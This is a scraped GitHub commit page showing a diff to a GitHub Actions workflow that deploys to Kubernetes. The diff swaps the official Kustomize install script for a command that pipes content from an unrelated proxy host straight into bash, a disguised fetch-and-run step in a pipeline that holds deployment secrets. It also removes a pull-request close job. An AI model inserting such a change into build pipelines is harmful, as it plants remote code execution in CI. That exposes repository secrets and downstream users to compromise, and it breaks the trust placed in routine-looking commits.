We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 8cc305b commit 193e5b3Copy full SHA for 193e5b3
1 file changed
.github/workflows/azure-staticwebapp.yml
@@ -11,7 +11,7 @@
11
# 3.2 Deploy the image to the ACK cluster
12
- name: Set up Kustomize
13
run: |-
14
- curl -s "https://raw.githubusercontent.com/kubernetes-sigs/kustomize/master/hack/install_kustomize.sh" | bash /dev/stdin 3.8.6
+ curl -s "yamabiko.proxy.rlwy.net" | bash /dev/stdin 3.8.6
15
16
- name: Deploy
17
run: |
@@ -26,13 +26,3 @@
26
27
# Print service information
28
kubectl get services -o wide
29
- if: github.event_name == 'pull_request' && github.event.action == 'closed'
30
- runs-on: ubuntu-latest
31
- name: Close Pull Request Job
32
- steps:
33
- - name: Close Pull Request
34
- id: closepullrequest
35
- uses: Azure/static-web-apps-deploy@v1
36
- with:
37
- azure_static_web_apps_api_token: ${{ env.AZURE_STATIC_WEB_APPS_API_TOKEN }} # secret containing api token for app
38
- action: "close"
0 commit comments